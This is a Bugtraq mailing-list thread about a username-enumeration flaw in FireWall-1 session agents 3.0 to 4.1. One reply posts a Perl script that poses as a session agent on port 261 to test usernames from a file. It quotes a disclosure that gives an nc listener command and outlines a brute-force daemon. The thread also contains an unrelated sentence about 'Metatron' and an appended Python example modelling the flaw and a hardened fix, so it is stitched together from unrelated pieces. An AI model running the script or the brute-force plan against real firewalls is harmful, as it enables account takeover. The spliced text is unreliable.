Bugtraq mailing list archives
Re: Firewall-1 session agent 3.0 -> 4.1, dictionary and brute force attack
From: Nelson Brito <nelson () SEKURE ORG>
Date: Fri, 18 Aug 2000 07:39:15 -0300
Try this code and let me know if it works...

PS: Just a question, if the user is right and password wrong, Will it return error code?!?! =)

---brute-fw1-agent.pl
#!/usr/bin/perl -w
#
# File  : brute-fw1-agent.pl
# Author: Nelson Brito<nelson () secunet com br || nelson () sekure org>
#
# Untested code, use on your own risc.
#
use Socket;

$c = 0;
$port = 261;
#$proto = getprotobyname('tcp');

socket(FAGENT, PF_INET, SOCK_STREAM, getprotobyname("tcp")) or die "socket:$!";
setsockopt(FAGENT, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(FAGENT, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(FAGENT, SOMAXCONN) or die "listen: $!";

open(SDI, "users") or die "open: $!\n";
until(eof(SDI)){
    $user = <SDI>;
    chomp($user);
    next if ($user=~/^\s*#/);
    next if ($user=~/^\s*$/);
    push @users, $user;
}
close(SDI);

while(accept(MODULE, FAGENT)){
    LINE:
    $c++;
    print STDOUT "[+] Hii... I'm on TV $c times!\n";
    recv(MODULE, $target, 1024, 0);
    if($target=~/^331/i){
        chomp($users[0]);
        send(MODULE, "$users[0]\n", 0);
        recv(MODULE, $target, 1024, 0);
        if($target=~/^220/){
            recv(MODULE, $target, 1024, 0);
            if($target=~/^530/){
                shift @users;
                goto LINE;
            }else{
                die "[-] Unknow code. What happened?\n";
            }
        }elsif($target=~/^331/){
            print STDOUT "[+] The $users[0] username is right!\n";
        }else{
            die "[-] Uknow return code. What happened?\n";
        }
    }else{
        die "[-] Unknow return code. What happened?\n";
    }
}
---brute-fw1-agent.pl

gregory duchemin wrote:
hi,

every session agent from 3.0 to 4.1 (4.1 included, all platforms) is vulnerable to a brute force and dictionary style password attack.

while authenticating a user through its port 261, firewall modules send a "331 User:" string to the agent, wait for an answer, and then reply with a "220 User .... not found" directly followed by "530 NOTOK" if the username doesn't match the user database. If the username exists, the firewall will simply reply "331 *FireWall-1 password:" before waiting for a pass value.

So, the same weakness as on the old version of unix's login: we can know if a username exists or not.

try #nc -l -p 261 on your workstation, then connect to an outside service that needs session authentication.

Because firewall-1 doesn't close the connection just after a mistaken username or password submission and seems to wait indefinitely for a correct entry, it should be really efficient to mount such an attack.

usernames and passwords are up to 8 chars in length and are usually built on some logical rules (typically based on first and last names for usernames, and more generally on dictionary words). A C or perl program with a dictionary trying permutations on each word should be able to quickly recover many corporate accounts. This program would be a little daemon, and would have to send a spoofed request to the outside before each connection; finally, it should be able to accept a significant number of simultaneous connections to increase its chances of success.

I don't have the time right now to write the code.

Just verify your passwords are hard enough, in the same way you already did it with your unix passwords. And for those who have a 4.1 firewall module, just use encryption.

Have a nice day

Gregory Duchemin
Sorry for my poor English!

Regards,
--
Nelson Brito - http://stderr.sekure.org/

During a meditation session, Santana said, an entity called Metatron had announced: "We want to hook you back to the radio-airwave frequency."
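Added example (not from the original post, and not Check Point's code): a model of the reply sequence Gregory describes, placed beside a hardened responder that asks every username for a password, answers every failure with the same generic reply, and drops the session after a few failures instead of waiting indefinitely. The user database, the success reply and the "421" close code are constructed placeholders; the post does not quote them.

```python
import hmac

# Constructed sample user database; not a real FireWall-1 user store.
KNOWN_USERS = {"alice": "s3cret!!", "bob": "hunter22"}
MAX_ATTEMPTS = 3     # hardened agent closes the session after this many failures
SUCCESS = "OK"       # the post does not quote the success reply; placeholder


def leaky_login(username, password):
    """Reply sequence as described in the post: an unknown user is rejected
    before any password is requested, so valid and invalid usernames answer
    differently and the agent acts as a username oracle."""
    if username not in KNOWN_USERS:
        return ["220 User %s not found" % username, "530 NOTOK"]
    if KNOWN_USERS[username] != password:
        return ["331 *FireWall-1 password:", "530 NOTOK"]
    return ["331 *FireWall-1 password:", SUCCESS]


class HardenedSession:
    """Models a fixed agent: every username is asked for a password, every
    failure gets the same reply, and the session is closed after MAX_ATTEMPTS
    failures rather than accepting guesses for as long as the client likes."""

    def __init__(self):
        self.failures = 0
        self.open = True

    def login(self, username, password):
        if not self.open:
            return ["421 Session closed"]          # hypothetical close code
        stored = KNOWN_USERS.get(username, "")    # same code path for unknown users
        # Compare first, then check membership, so unknown users still pay
        # for the comparison instead of short-circuiting past it.
        ok = hmac.compare_digest(stored.encode(), password.encode()) \
            and username in KNOWN_USERS
        if ok:
            return ["331 *FireWall-1 password:", SUCCESS]
        self.failures += 1
        if self.failures >= MAX_ATTEMPTS:
            self.open = False
        return ["331 *FireWall-1 password:", "530 NOTOK"]


def distinguishes_users(login):
    """True if one failed attempt already reveals whether the username exists."""
    return login("alice", "wrong") != login("nobody", "wrong")
```

Running `distinguishes_users` against `leaky_login` returns True, against `HardenedSession().login` it returns False, which is the property the fix has to restore.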
Current thread:
- Firewall-1 session agent 3.0 -> 4.1, dictionary and brute force attack gregory duchemin (Aug 16)
- Re: Firewall-1 session agent 3.0 -> 4.1, dictionary and brute force attack Nelson Brito (Aug 18)